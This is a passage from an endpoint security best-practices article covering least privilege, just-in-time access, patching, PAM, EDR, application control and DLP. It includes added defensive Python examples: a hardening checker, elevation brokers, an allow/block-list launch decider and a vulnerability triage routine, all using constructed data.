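            # Fail closed: an unverifiable control is treated as not in place.
            findings.append({"host": ep["host"], "severity": "medium", "check": key,
                             "detail": "setting not reported"})
        elif settings[key] != required:
            findings.append({"host": ep["host"], "severity": severity, "check": key,
                             "detail": f"is {settings[key]!r}, expected {required!r}: {why}"})
    allowed = ALLOWED_PORTS.get(ep.get("role", "workstation"), set())
    for port in sorted(set(ep.get("listening_ports", [])) - allowed):
        findings.append({"host": ep["host"],
                         "severity": "high" if port in HIGH_RISK_PORTS else "low",
                         "check": "listening_port", "detail": f"unexpected listener on tcp/{port}"})
    return findings


def check_fleet(endpoints):
    return {ep["host"]: check_endpoint(ep) for ep in endpoints}


def worst_severity(findings):
    order = ["low", "medium", "high", "critical"]
    return max((f["severity"] for f in findings), key=order.index, default="none")


# Constructed endpoint records (not real data).
ENDPOINTS = [
    {"host": "WS01", "role": "workstation",
     "settings": {"smb1_enabled": True, "rdp_nla_required": False, "disk_encryption": True,
                  "guest_account_enabled": False, "local_admin_password_managed": True},
     "listening_ports": [3389, 445]},
    {"host": "SRV01", "role": "server",
     "settings": {"smb1_enabled": False, "rdp_nla_required": True, "disk_encryption": True,
                  "guest_account_enabled": False, "local_admin_password_managed": True,
                  "autorun_enabled": False},
     "listening_ports": [22, 443]},
]

if __name__ == "__main__":
    for host, findings in check_fleet(ENDPOINTS).items():
        print(f"{host}: worst={worst_severity(findings)}")
        for f in findings:
            print(f"  [{f['severity']}] {f['check']}: {f['detail']}")
```

The "setting not reported" branch matters more than it looks: the most common way a hardening program silently decays is an agent or script that stops collecting a value, and a checker that skips missing keys will then report the fleet as compliant.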

4. Enforce Least Privilege across all your endpoints. This means restricting access rights and permissions to the lowest level required for endpoints, the processes, software, and applications that run on them, and the users that use them. Privileged accounts and access should be outright eliminated wherever possible. Holistically enforcing least privilege, from desktops to servers to IoT, and across users, applications, software, etc., is one of the most surefire and fundamental security protections organizations can implement to minimize their risk surface and threat windows, while helping ensure optimal endpoint performance. Because of the immense potential for destruction inherent to superuser/IT admin privileges (particularly Administrator, Domain Admin, or root) if misused or abused, users should only be able to log into privileged accounts when absolutely necessary, and only for the finite moments (known as just-in-time access) that privileged access is required. The risk-reduction potential of least privilege is well established. The Microsoft Vulnerability Report 2020 found that eliminating local admin rights (removing privileges) on endpoints alone would have mitigated 83% of Critical Microsoft vulnerabilities over a 5-year period. BeyondTrust CTO/CISO Morey Haber published vulnerability research showing similar reductions could also be achieved by enforcing least privilege across third-party applications, including Oracle, Google, Adobe, VMware, Cisco, etc. Since much malware, including ransomware, needs elevated privileges to disable defenses, persist, or spread, least privilege can prevent attacks from compromising an endpoint in the first place. In instances where an endpoint has already been breached (e.g. via stolen credentials), malware and attackers (including insiders) typically need privileged access to move around the environment, known as lateral movement.
Reducing privilege to the minimum level means that, even if attackers gain a foothold, they are essentially marooned, and the attack is contained. Moreover, by enforcing just-in-time privileged access, which is done by granting access only when certain contextual conditions are met and revoking it when a time limit expires, you limit the duration that privileges are actually available for use and exploitation, condensing the threat window. The ability of least privilege to work across three dimensions (preventing attacks from landing and executing, limiting and preventing movement, and restricting privilege availability based on time) makes least privilege arguably the most important and powerful security best practice. Least privilege can protect against both known and unknown threats, whether they originate internally or externally.
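The just-in-time model described above can be expressed as a small broker that issues time-bounded, host-bound elevation tokens only when the contextual conditions hold. The following Python class is an added example, not part of the original post and not any vendor's product; the eligibility map, ticket format and TTL ceiling are assumptions, and the clock is injectable so expiry can be tested without waiting:

```python
"""Time-bounded, just-in-time privilege elevation with an audit trail.

Added example, not code from the original post and not any vendor's product.
It models the policy described above: privileged access is granted only when
context conditions are met (requester is eligible for the host, a change
ticket is present, a second person approves) and expires on its own. The
eligibility map, TTL ceiling and ticket format are assumptions. The clock is
injected so the expiry logic can be exercised deterministically.
"""
import re
import secrets
import time

# Assumed eligibility: which hosts each identity may ever be elevated on.
ELIGIBILITY = {"it-admin1": {"*"}, "it-admin2": {"SRV01", "SRV02"}, "jdoe": set()}
TICKET_RE = re.compile(r"^CHG-\d{3,}$")


class JitBroker:
    def __init__(self, max_ttl=900, eligibility=ELIGIBILITY, clock=time.time):
        self.max_ttl = max_ttl
        self.eligibility = eligibility
        self.clock = clock
        self._grants = {}     # token -> grant record
        self.audit_log = []   # append-only trail of every decision and use

    def _log(self, event, **fields):
        self.audit_log.append({"t": self.clock(), "event": event, **fields})

    def request(self, user, host, ticket, ttl, approved_by):
        """Issue a token usable by `user` on `host` for at most `ttl` seconds."""
        allowed = self.eligibility.get(user, set())
        if not ("*" in allowed or host in allowed):
            self._log("denied", user=user, host=host, reason="not eligible")
            raise PermissionError(f"{user} is not eligible for {host}")
        if not TICKET_RE.match(ticket or ""):
            self._log("denied", user=user, host=host, reason="no valid ticket")
            raise PermissionError("a change ticket is required")
        if approved_by == user:
            self._log("denied", user=user, host=host, reason="self-approval")
            raise PermissionError("requester cannot approve their own elevation")
        ttl = min(int(ttl), self.max_ttl)          # never exceed the policy ceiling
        token = secrets.token_urlsafe(24)
        self._grants[token] = {"user": user, "host": host, "expires": self.clock() + ttl,
                               "ticket": ticket, "approved_by": approved_by}
        self._log("granted", user=user, host=host, ttl=ttl, ticket=ticket)
        return token

    def check(self, token, user, host):
        """True only while the token is unexpired and bound to this user and host."""
        self._expire()
        g = self._grants.get(token)
        ok = bool(g) and g["user"] == user and g["host"] == host
        self._log("use", user=user, host=host, allowed=ok)
        return ok

    def revoke(self, token):
        if self._grants.pop(token, None):
            self._log("revoked", token=token[:8])

    def _expire(self):
        now = self.clock()
        for tok in [t for t, g in self._grants.items() if g["expires"] <= now]:
            self._log("expired", user=self._grants[tok]["user"], host=self._grants[tok]["host"])
            del self._grants[tok]

    def active_grants(self):
        self._expire()
        return [dict(g) for g in self._grants.values()]


if __name__ == "__main__":
    broker = JitBroker(max_ttl=900)
    tok = broker.request("it-admin2", "SRV01", "CHG-1042", ttl=600, approved_by="it-admin1")
    print("elevated on SRV01:", broker.check(tok, "it-admin2", "SRV01"))
    print("elevated on SRV02:", broker.check(tok, "it-admin2", "SRV02"))
    broker.revoke(tok)
    print("after revoke:", broker.check(tok, "it-admin2", "SRV01"))
    for entry in broker.audit_log:
        print(entry)
```

Two design points carry the security value: the token is bound to a single host, so a grant for one server cannot be replayed against another, and the broker, not the requester, owns the clock, so the threat window closes on schedule even if the session that was using the privilege is still open.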

5. Apply encryption to protect data stored on the device and in transit. To minimize the risk of data leaks, the strength of encryption should at least meet, and potentially exceed, that which is required by any applicable regulatory standards. More sensitive data (for instance, health data or superuser credentials) may necessitate higher levels of encryption than less sensitive data. A benefit of encryption is that, even if a device is stolen or an email is intercepted, if robust encryption is in place, the data will be unreadable and, therefore, unusable. Under many regulatory and compliance initiatives, including the HIPAA Breach Notification Rule, the theft or loss of adequately encrypted computing or storage devices is not considered a reportable data breach.

6. Identify, prioritize, and remediate vulnerabilities: A fundamental piece of endpoint security is to assess for known vulnerabilities, such as Common Vulnerabilities and Exposures (CVE), against the operating system, firmware, custom software, commercial applications, etc., running on your endpoints. Your organization should have a mature patch management program and a strong policy that dictates desired software configurations and how any changes should occur, if needed. Also ensure devices are running supported versions of firmware, software, applications, etc. In some cases, risk-benefit analysis may dictate that no remediation action be taken. This is often the case where a vulnerability may have a low risk, but the fix for it may cause disruption across many endpoints, or it may potentially impact mission-critical systems operations. Remediating vulnerabilities could entail applying a patch, performing a configuration change, eliminating embedded or default credentials, etc. Many regulations and security frameworks, including NIST, PCI DSS, and HIPAA, emphasize vulnerability management as it is one of the most fundamental of all IT security areas. Aside from patch management, vulnerability management may also involve pen testing and threat hunting. Pen testing typically involves third-party security professionals and tools probing for vulnerabilities across your endpoints that can be exploited. In the absence of a working exploit, a vulnerability by itself is just a theoretical risk. However, once an exploit has been architected for a vulnerability, it becomes a threat. Threat hunting is the process of proactively seeking out threats by looking for indicators of compromise (IoCs), with the basic assumption that an attack has already occurred and a threat actor is active in your environment.

7. Implement threat detection, prevention, and mitigation. Many viruses, ransomware, and other malware threats are already known and documented. This knowledge should be applied (such as via an antivirus/antimalware solution) to ensure these threats are blocked or quarantined, and they are removed or immediately mitigated if found on an endpoint. While implementing signature-based threat protection might only protect your environment against up to 40% of malware threats, it is an important line of defense as part of a multi-layered cyber defense strategy, and a requirement for all regulatory compliance mandates.

8. Protect devices from physical threats, such as by implementing anti-theft technology on the devices (e.g. smartphones) themselves, enabling GPS location awareness, providing security cables for laptops, and restricting physical access to where the devices are used or stored. For instance, you may want to ensure laptops are locked in a secure cabinet in an area that is under constant human and/or video surveillance, or that they are never left unattended in a car.

9. Secure vendor endpoints and remote access: Organizations should ideally strive to achieve the same security best practices they uphold within their perimeter beyond their perimeter as well. Where endpoints and identities are concerned, this means ensuring only the right identity on the right endpoint (which has been properly hardened) has access to the right resources, and within the right context. To ensure the right identity is doing the right things with the vendor account/endpoint, you need to apply basic identity management and privileged identity controls such as enforcing least privilege, rotating passwords, multi-factor authentication, and one-time passwords (OTPs) to limit the damage of stolen credentials. Session management and monitoring should also be layered on to audit and control all vendor/remote access-initiated session activity occurring across the organization’s endpoints.

10. Integrate your endpoint security technologies with each other and across the rest of your security and IT stack. The better your endpoint security solutions integrate and communicate with the rest of your tools, the more informed your picture of risk and the more rapidly you can orchestrate a pinpoint response to prevent, mitigate, or remediate attacks. One of the first questions you should ask whenever evaluating a new endpoint security tool is—how does it integrate with the rest of my security ecosystem? Does it create synergies, or does it create more complexity and administration issues? Any new tool/solutions should naturally fit within, and become an integrated part of, your IT and IS environment.
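Best practice 4 above describes just-in-time privileged access as elevation triggered only when contextual parameters are met, and only for a finite period. The following is an added example, not BeyondTrust's code or any product's policy engine: a minimal broker that checks a request against group membership, step-up MFA, a justification ticket and a time window, and issues a grant that expires on its own. The users, groups, applications, endpoint names and policy table are all constructed.

```python
"""Added example (not the page's or any vendor's code): a minimal
just-in-time (JIT) elevation broker. No account holds standing admin
rights; a request is checked against contextual parameters and, if all
pass, a short-lived grant is issued. Every name below is constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, Optional, Set, Tuple


@dataclass(frozen=True)
class ElevationRequest:
    user: str
    endpoint: str
    application: str          # program the user wants to run elevated
    ticket: Optional[str]     # change/incident ticket justifying the request
    mfa_verified: bool        # step-up authentication completed for this request
    requested_at: datetime


@dataclass(frozen=True)
class Grant:
    user: str
    endpoint: str
    application: str
    expires_at: datetime


# Constructed policy: which programs may be elevated, by which groups, and
# for how long. In a real deployment this comes from the PAM/EPM policy store.
POLICY: Dict[str, Dict] = {
    "msiexec.exe": {"groups": {"desktop-support"}, "ttl_minutes": 15},
    "services.msc": {"groups": {"server-ops"}, "ttl_minutes": 10},
}
GROUP_MEMBERSHIP: Dict[str, Set[str]] = {
    "alice": {"desktop-support"},
    "bob": {"server-ops"},
}
ELEVATION_WINDOW = (8, 20)   # elevation permitted only 08:00-19:59 UTC
AUDIT_LOG = []               # every decision, granted or denied, is recorded


def evaluate(req: ElevationRequest) -> Tuple[Optional[Grant], str]:
    """Return (grant, reason). A grant is issued only when every contextual
    check passes; otherwise the reason names the control that denied it."""
    grant, reason = None, ""
    rule = POLICY.get(req.application)
    if rule is None:
        reason = "application not eligible for elevation"
    elif not (GROUP_MEMBERSHIP.get(req.user, set()) & rule["groups"]):
        reason = "user not in an authorised group for this application"
    elif not req.mfa_verified:
        reason = "MFA required before elevation"
    elif not req.ticket:
        reason = "a justification ticket is required"
    elif not (ELEVATION_WINDOW[0] <= req.requested_at.hour < ELEVATION_WINDOW[1]):
        reason = "outside the permitted elevation window"
    else:
        expires = req.requested_at + timedelta(minutes=rule["ttl_minutes"])
        grant = Grant(req.user, req.endpoint, req.application, expires)
        reason = "granted"
    AUDIT_LOG.append((req.requested_at.isoformat(), req.user, req.endpoint,
                      req.application, reason))
    return grant, reason


def is_active(grant: Grant, now: datetime) -> bool:
    """The grant is usable only until it expires; afterwards the user is
    back at standard privilege with no revocation step needed."""
    return now < grant.expires_at


if __name__ == "__main__":
    t = datetime(2024, 1, 15, 10, 0, tzinfo=timezone.utc)   # constructed time
    req = ElevationRequest("alice", "LT-0421", "msiexec.exe", "CHG-1234", True, t)
    g, why = evaluate(req)
    print(why, g.expires_at.isoformat() if g else "")
```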

The Benefits of Endpoint Security

With the right mix of strategies and technologies tailored to their environment, organizations can maximize protection for endpoints, support high levels of operational performance and end-user productivity, and comply with requisite regulations. Here are some key benefits of endpoint security:

  • Improves security: This is the most obvious benefit. Enforcing least privilege and managing vulnerabilities drastically reduces the threat surface. Applying JIT access controls condenses threat windows. Employing signature-based tools keeps endpoints safe from known threats. All of these layered tools and strategies drive down the risk of security incidents and data breaches that may arise from external or internal threats.
  • Enhances endpoint performance: Eliminating superfluous privileges and hardening devices (e.g. removing unnecessary components, blocking unnecessary processes) translates into fewer misconfigurations, incompatibilities, security incidents, and other issues that may cause disruption. Preventing malware infection or endpoint compromise by an unauthorized user also protects against endpoint instability.
  • Simplifies compliance and auditability: Restricting features in accordance with least privilege reduces complexity of the universe of enterprise endpoints, greatly simplifying the path to compliance. Implementing security controls like session monitoring and management and vulnerability assessments may also provide instant visibility and reporting necessary for compliance efforts. The more tightly an endpoint system is integrated, and the better the visibility across the endpoint universe, the more straightforward the path to compliance.
  • Enables the enterprise: A strong endpoint cybersecurity posture enables the enterprise in a number of ways. The right security tools can allow IT to securely enable more types of endpoints, heterogeneous infrastructure, and confidently pursue business-enabling changes to the environment, including the roll-out of new technologies. For instance, organizations that already had a robust endpoint security deployment were well-prepared for the seismic shift to remote work during the early days of coronavirus. Increasingly, cybersecurity posture is also assessed before entering a partnership with another company. Cybersecurity posture is also evaluated for companies undergoing the acquisition process, as acquiring companies are increasingly sensitive to negative security surprises that may have inherent incompatibilities with system integration, have a high cost to rectify, or may involve regulatory fines or remuneration payments to impacted parties.

Top Endpoint Security Technologies

According to a 2020 Ponemon/Morphisec study, 68% of organizations have experienced one or more endpoint attacks that successfully compromised data assets and/or IT infrastructure over the last two years. Moreover, anti-virus/anti-malware solutions reportedly miss an average of 60 percent of attacks. Of the attacks that compromised an endpoint, 80% are characterized as zero days (for which signature-based antivirus/anti-malware is ineffective), 17% as known attacks, and for 3% the respondents are unsure.

While traditional AV/anti-malware remains an important security layer, it is just one layer that helps create a holistic, multi-layered endpoint security approach. Together, your endpoint security solutions should protect against both internal and external threats, whether on-prem, connecting remotely, physical, virtual, or in the cloud.

Here are the core endpoint security solutions, ordered by priority:

Antivirus / antimalware are perhaps the most traditional and well-recognized forms of endpoint protection. AV / antimalware typically works by scanning traffic to a device and/or the device’s content for patterns that match a database of virus signatures. While many IT thought leaders have touted the demise of AV, it remains widely deployed. Basic antivirus software provides detection and protection against known threat signatures. Today, most AV and anti-malware solutions have evolved to incorporate some advanced protection methodologies that incorporate heuristics, behavioral analysis, and even machine learning. Enterprise AV / antimalware solutions are typically installed on a wide array of devices, including servers, desktops and laptops, gateways, and more. These solutions, which may include “next-generation AV”, are centrally managed from the corporate network in most instances. Some devices, such as smartphones, require specialized AV solutions that work at the device level only. However, one limitation with AV is that many types of endpoints, such as IoT, lack the computing resources necessary to install and run AV, though cloud-based AV deployments may be of some use in these cases. Other well-known drawbacks of solutions in this class include a hit to device or network performance when the solution is running, a high number of missed threats, and a large number of false positives and security alerts that hinder IT’s ability to respond to what is important. ‘Next-generation’ solutions tend to avoid some of these issues by leveraging cloud processing and foregoing the use of bloated agents. Some solutions also include sandboxing capabilities, which allow for quarantine of an unknown/suspicious program and running it in isolation to see if malicious characteristics present themselves.

Privileged Access Management (PAM) solutions manage privileges/privileged access for users (human and machine), endpoints, systems, applications, processes, etc. PAM solutions also monitor, manage, and record activity occurring during privileged sessions. While there are many point solutions in this space, complete PAM platforms are comprised of the following three functional areas:

  • Privileged Credential/Password Management, also called Privileged Account & Session Management (PASM), solutions enable automated discovery and onboarding of all privileged accounts, secure access to privileged credentials and secrets for humans and machines, and auditing of all privileged activities. Privilege credential management solutions also eliminate embedded passwords in IoT, applications, DevOps tools, etc. and replace them with API calls, or in the case of DevOps and CI/CD toolsets, implement dynamic secrets. Session monitoring and management capabilities empower organizations to audit all activity and home in on and pause or terminate suspicious sessions. By enforcing password security best practices across all types of credentials (passwords, secrets, SSH keys, etc.), privileged credential management solutions eliminate or mitigate threats such as password reuse, pass-the-hash (PtH), and stolen credentials. They also create unique and complex passwords able to withstand automated cracking tools, and that are never revealed to the end user.
  • Endpoint Privilege Management, also called Privilege Elevation & Delegation (PEDM), solutions combine least privilege management and advanced application control capabilities to condense the endpoint attack surface, eliminate unwanted lateral movement, and minimize threat windows by applying just-in-time access models. Endpoint privilege management can be applied to Windows, Mac, Unix, Linux systems, network devices, IoT, and more. These solutions remove admin rights from end-users and dynamically elevate access to applications just for the moments needed. Endpoint privilege management solutions are also used to securely elevate applications via powerful rules engines and comprehensive exception handling. Some solutions can also enable passwordless administration, which is the ability to perform administrative functions on an endpoint without the need for privileged or administrator credentials. Endpoint privilege management is a powerful technology that protects endpoints from insiders as well as a range of sophisticated external threats such as fileless/living-off-the-land (LotL) attacks, ransomware, zero-day attacks, and more. The combination of application control and privilege management can also be used to eliminate, or at least put controls around, shadow IT.
  • Secure Remote Access solutions enable organizations to extend PAM best practices to remote access. These solutions apply least privilege and robust audit controls to all remote access required by employees, vendors, and service desks. With secure remote access PAM solutions in place, users should be able to quickly and securely access any remote endpoints, running any platform, located anywhere. The granular privilege control and specialized security capabilities of this software far transcends that of VPNs, which it often replaces. By integrating with the privileged password management component of PAM solutions, vendor credentials can also be securely managed (rotated, encrypted, etc.) from a centralized vault, and injected when needed so the vendor never sees them. Secure Remote Access PAM solutions also provide granular auditing to make traditionally complex requirements straightforward.

Comprehensive privileged access management solutions deliver powerful threat reduction and risk mitigation across an organization’s entire privilege universe. PAM solutions can be deployed on-prem, in the cloud, or hybrid. They can also be a key requirement of any zero trust initiative.

Endpoint protection platforms (EPP) are generally comprised of a multilayer set of security technologies managed through a centralized console. These solutions aim to protect against multiple threat vectors across an enterprise’s endpoint estate. Many EPPs leverage the cloud to perform analysis, eliminating any processing hit to endpoints. Endpoint protection platforms can be delivered as SaaS and managed remotely, or they can be installed directly on devices with central management software hosted on a server. EPP solutions typically scan files via an advanced AV/antimalware engine that detects known threats by signature and incorporates behavioral analysis to expand threat protection. EPPs usually incorporate endpoint firewalls that help tightly control network traffic through specific ports on the individual endpoints. Endpoint protection platforms may also incorporate basic application control (whitelisting, blacklisting), sandboxing (executing files in a virtual environment to inspect for malicious behavior before allowing them to run), and machine learning capabilities.

Endpoint management encompasses a range of solutions and processes around managing the lifecycle of endpoints. Endpoint management solutions may be capable of discovering, onboarding/registering, provisioning, updating, monitoring, and troubleshooting endpoint devices connecting to the enterprise network from a central location. Solutions in this category include mobile device management (MDM), enterprise mobility management (EMM), and unified endpoint management (UEM), which may integrate a number of capabilities, including MDM, EMM, etc. While point solutions like MDM and EMM (which usually includes MDM and other technologies) work across certain types of mobile devices, UEM solutions strive to wrap lifecycle management capabilities around a diverse array of both traditional and emerging devices, including servers, desktops, mobile devices, IoT, and more. Endpoint management solutions play a key role in optimizing device performance, ensuring correct configurations, and establishing a consistent baseline of device hygiene. These solutions also allow for remote management and can even wrap in security controls, such as remote data wipe, anti-tampering, and geo-tracking, that provide protection in the event a device is lost or stolen.

Endpoint detection and remediation (EDR) solutions continuously inspect files and applications that enter a device to extend protection beyond simple signature-based threats. This includes protecting against some types of ransomware, zero-day threats, fileless malware, and more advanced attacks. In contrast to EPP solutions, EDR solutions can provide a deeper level of advanced threat analysis and forensics, and they play a bigger role in containing and responding to a security incident or breach event once it has already occurred. However, one of the drawbacks of EDR solutions can be a high number of false positives and security alerts.

Encryption is an essential feature for both data security and endpoint security. Simply defined, encryption is the process of encoding data (including passwords) so that it is unreadable and unusable unless the possessor of the data has the correct decryption key. As encryption cracking tools have become more powerful, encryption methodologies have had to evolve. While encryption capabilities are important components of many endpoint security solutions (PAM, DLP, endpoint firewalls) as well as natively on device firmware and software, there are also standalone solutions designed to encrypt endpoint data. Endpoint encryption software typically either protects individual files, or is applied across the entire hard drive, known as full disk encryption.

Application control solutions protect endpoints, most commonly end-user devices and servers, from executing unauthorized applications. Traditionally, these solutions make use of allow lists (whitelists), block lists (blacklists), and greylists. Greylisted applications are applications that have been identified, but have not been added to allow or block lists. Special security rules may be put in place so that greylisted applications can run in some circumstances, as needed.

Application control solutions may also be able to enforce granular control over application usage—such as allowing a particular user/endpoint to execute a certain subfunction of an application, while disabling or blocking the execution of other application functions for that user/endpoint. Cloud-based reputation services may also be leveraged to determine whether or not an application is safe to run. Application control can be sold as a point solution, or be included in other platforms, such as endpoint privilege management, or next-generation firewalls (NGFWs). Integration within these other platforms often allows for natural augmentation of the capabilities that provide advanced application protection. Application control solutions must be finely calibrated to enable seamless use of authorized applications for legitimate use cases, while preventing against malware, ransomware, and other threats.
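The decision logic described above, as an added example that is not the page's code or any product's engine: a launch is matched against allow and block lists keyed on the binary's hash, and a greylisted program is decided by context (its signer, where it was launched from, and which process spawned it). The lists, publisher names, paths and stand-in binaries are constructed.

```python
"""Added example (not the page's or any vendor's code): an application
control decision using allow, block and grey lists keyed on SHA-256, with
contextual rules for greylisted programs. Binaries, hashes, publishers and
paths are constructed stand-ins, not real software."""
import hashlib
from dataclasses import dataclass
from typing import Dict, Tuple


@dataclass(frozen=True)
class LaunchEvent:
    path: str        # image path the endpoint agent observed
    sha256: str      # hash of the file on disk at launch time
    user: str
    publisher: str   # code-signing subject, "" if unsigned
    parent: str      # parent process image name


def fingerprint(binary: bytes) -> str:
    """Identify a program by content, not by name: renaming a blocked
    binary does not change its hash."""
    return hashlib.sha256(binary).hexdigest()


# Constructed stand-ins for binaries the agent has already catalogued.
VPN_BINARY = b"constructed bytes standing in for vpn.exe"
MINER_BINARY = b"constructed bytes standing in for a known coin miner"

ALLOW: Dict[str, str] = {fingerprint(VPN_BINARY): "corporate VPN client"}
BLOCK: Dict[str, str] = {fingerprint(MINER_BINARY): "known cryptominer"}
TRUSTED_PUBLISHERS = {"Example Corp IT", "Example Vendor Ltd"}
USER_WRITABLE = ("/home/", "/tmp/", "C:\\Users\\", "C:\\Windows\\Temp\\")
DOCUMENT_HANDLERS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}


def decide_launch(ev: LaunchEvent) -> Tuple[str, str]:
    """Return (decision, reason). decision is 'allow', 'block' or 'audit';
    'audit' lets a greylisted program run while recording it for review."""
    # Explicit lists win; block is checked first so a hash on both lists
    # cannot run through a stale allow entry.
    if ev.sha256 in BLOCK:
        return "block", f"block-listed: {BLOCK[ev.sha256]}"
    if ev.sha256 in ALLOW:
        return "allow", f"allow-listed: {ALLOW[ev.sha256]}"
    # Greylist: identified but on neither list, so context decides.
    if ev.parent.lower() in DOCUMENT_HANDLERS:
        return "block", f"greylisted program spawned by {ev.parent}"
    if ev.path.startswith(USER_WRITABLE) and not ev.publisher:
        return "block", "unsigned greylisted program in a user-writable location"
    if ev.publisher in TRUSTED_PUBLISHERS:
        return "allow", f"greylisted but signed by trusted publisher {ev.publisher}"
    return "audit", "greylisted program: run permitted, event logged for review"


if __name__ == "__main__":
    unknown = fingerprint(b"constructed bytes for an uncatalogued tool")
    for ev in (
        LaunchEvent("C:\\Program Files\\VPN\\vpn.exe", fingerprint(VPN_BINARY),
                    "alice", "Example Corp IT", "explorer.exe"),
        LaunchEvent("C:\\Users\\alice\\Downloads\\tool.exe", unknown,
                    "alice", "", "explorer.exe"),
        LaunchEvent("C:\\Program Files\\Tool\\tool.exe", unknown,
                    "alice", "", "winword.exe"),
    ):
        print(ev.path, *decide_launch(ev))
```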

Patch management solutions automate the process of downloading patches, identifying the endpoints, applications, or other software that need the patches, and then, usually after the patches have been tested and a human has approved them, applying the patches. While patches may need to be manually applied in some instances, automating the process as much as possible helps organizations scale to meet the thousands of vulnerabilities across their endpoint estate. When dealing with a dangerous vulnerability for which an exploit already exists in the wild, time is of the essence, so automation is key. Patch management is a core part of vulnerability management and is often tightly integrated with enterprise vulnerability management solutions.

Vulnerability management (VM) solutions provide a proactive approach to discovering, analyzing, and remediating vulnerabilities. Drawing from vulnerability databases (CVE, etc.), these solutions perform vulnerability scans that deliver a snapshot of the vulnerabilities found across the endpoint environment. VM solutions put context around the risk that helps the organization evaluate the scope and level of risk posed by the threat, weighing that against the mitigation options for the vulnerability. Vulnerability scans generally only represent a moment-in-time snapshot, though some scans that are low-impact on resources may run continuously. Scans often need to run on sensitive resources that require privileged access. These are called credentialed scans as they require injection of credentials to be run. Due to the highly sensitive and privileged nature of such scans, the credentials should be injected into the VM solution using an enterprise privileged credential management solution. Credentialed scans tend to uncover more dangerous threats than non-credentialed scans. While the vulnerability scanning processes themselves can be highly automated and, depending on the solution, scale across the entire IT infrastructure, human input is typically required to ultimately determine and initiate the best course of action. Of course, most vulnerability management solutions are dependent on databases of known vulnerabilities (signatures) and provide limited, if any, protection against zero-day threats. A good vulnerability management tool should be continuously updated with the latest vulnerability signatures.
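The distinction drawn in best practice 6 above (a vulnerability with no working exploit is a theoretical risk; once an exploit exists it is a threat) and the risk-benefit weighing described there and in this section can be reduced to a triage routine. The following is an added example, not the page's or any vulnerability management product's code; its weights, CVE identifiers, hosts and findings are constructed placeholders.

```python
"""Added example (not the page's or any vendor's code): triage of scan
findings. Exploit availability turns a theoretical risk into a threat; the
action then weighs severity, reach and asset criticality against how
disruptive the fix would be. CVE ids and weights are constructed."""
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Finding:
    cve: str
    cvss: float              # base score 0.0-10.0
    exploit_available: bool  # a working exploit is public or observed
    affected_endpoints: int
    mission_critical: bool   # present on systems whose outage is unacceptable
    fix_disruptive: bool     # remediation needs reboot/outage or breaks apps


@dataclass(frozen=True)
class Decision:
    cve: str
    classification: str   # "threat" or "theoretical risk"
    action: str           # "patch now", "schedule", "mitigate" or "accept"
    score: float


def classify(f: Finding) -> str:
    return "threat" if f.exploit_available else "theoretical risk"


def risk_score(f: Finding) -> float:
    """Severity scaled by exploitability and criticality, plus a capped
    bump for breadth (1 endpoint adds 0.1, 900+ endpoints add 3.0).
    The multipliers are illustrative, not from any standard."""
    score = f.cvss
    if f.exploit_available:
        score *= 1.5
    if f.mission_critical:
        score *= 1.2
    score += min(3.0, (f.affected_endpoints ** 0.5) / 10)
    return round(score, 2)


def decide_finding(f: Finding) -> Decision:
    kind = classify(f)
    if kind == "threat" and (f.cvss >= 7.0 or f.mission_critical):
        action = "patch now"     # exploitable and severe: disruption is secondary
    elif kind == "threat":
        action = "schedule"      # exploitable but lower severity: next window
    elif f.cvss >= 7.0:
        # No exploit yet. If the fix itself is the bigger operational risk,
        # apply a compensating control and watch for an exploit to appear.
        action = "mitigate" if (f.fix_disruptive and f.mission_critical) else "schedule"
    elif f.fix_disruptive:
        action = "accept"        # low risk, costly fix: document and re-evaluate
    else:
        action = "schedule"
    return Decision(f.cve, kind, action, risk_score(f))


def triage(findings: List[Finding]) -> List[Decision]:
    """Decisions ordered by descending score, so the queue is worked from
    the most dangerous finding down."""
    return sorted((decide_finding(f) for f in findings),
                  key=lambda d: d.score, reverse=True)


# Constructed sample findings; the CVE ids are placeholders, not real entries.
SAMPLE = [
    Finding("CVE-0000-0001", 9.8, True, 1200, False, True),
    Finding("CVE-0000-0002", 5.3, False, 40, False, True),
    Finding("CVE-0000-0003", 8.1, False, 3, True, True),
    Finding("CVE-0000-0004", 6.5, True, 300, False, False),
]

if __name__ == "__main__":
    for d in triage(SAMPLE):
        print(f"{d.cve}  {d.score:>6}  {d.classification:<17}  {d.action}")
```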

Web filtering solutions, which can include URL filtering and more, put controls around the sites that users can access via their browsers and help mitigate the human element in threats. Organizations can block content by category and/or blacklist certain URLs. Employees reaching a blocked page will typically see a message informing them why access to the requested page has been restricted. Web filtering solutions can protect endpoints from visiting malicious sites that pose a risk of infection. Web filtering can also block content that a company deems inappropriate, which in some settings, such as K-12 schools, may be required for compliance.

Data Loss Prevention (DLP) solutions aim to prevent leakage or unauthorized transmission of data. DLP analyzes context and content to help ensure only the right individual or systems can access the data. Some use cases for DLP include preventing a user from:

  • Uploading or downloading unauthorized information from a USB
  • Accessing a sensitive file attachment in an email when using a personally-owned device
  • Emailing a sensitive document (such as containing financial results) to an individual who is not authorized to receive it
  • Inappropriately sharing sensitive content with a teammate or other individual over a messaging app—even if the app itself is authorized by the organization

DLP can be deployed across many types of endpoints and systems, including end-user devices, servers, and gateways, and is an important endpoint data protection technology. DLP leverages encryption and uses rules-based structure, database fingerprinting, and other techniques to make fast, accurate decisions about the legitimacy of data access requests. DLP solutions can also send alerts of inappropriate data access requests to the appropriate IT or compliance personnel.

Penetration (Pen) Testing solutions allow security teams and researchers to simulate attacks against an environment and probe for potential vulnerabilities to provide information useful to hardening the organization’s defenses. Pen testing is a highly proactive methodology that is part of an overall vulnerability management program. Some vulnerability management solutions may have built-in pen testing features. Pen testing is a useful way to find potential threats that other tools may miss, or just to better understand how potential changes to IT infrastructure and endpoint configurations could create new attack pathways.

Endpoint firewalls/host-based firewalls are software that runs on endpoints. This is in contrast to the types of firewalls (stateful, packet filtering, next-generation, etc.) more closely associated with network security. Endpoint firewalls are sometimes referred to as “personal firewalls” and they may be installed on and protect desktops, laptops, and servers. Endpoint firewalls inspect traffic, apply rules, and may even be able to perform behavioral monitoring to protect the endpoint from malware and attacks originating either within or outside of the corporate network. A web application firewall (WAF) is a subtype of endpoint firewalls and is used to protect endpoint-hosted applications and web services, such as WordPress, from SQL injections and other malicious attacks.

Anti-spyware detects, prevents, and removes unwanted software, including adware. While organizations tend to purchase anti-spyware (if they purchase it at all) as an add-on module to their anti-virus solutions, standalone software also exists, but is generally consumer-grade.

Evolving to Modern Endpoint Security

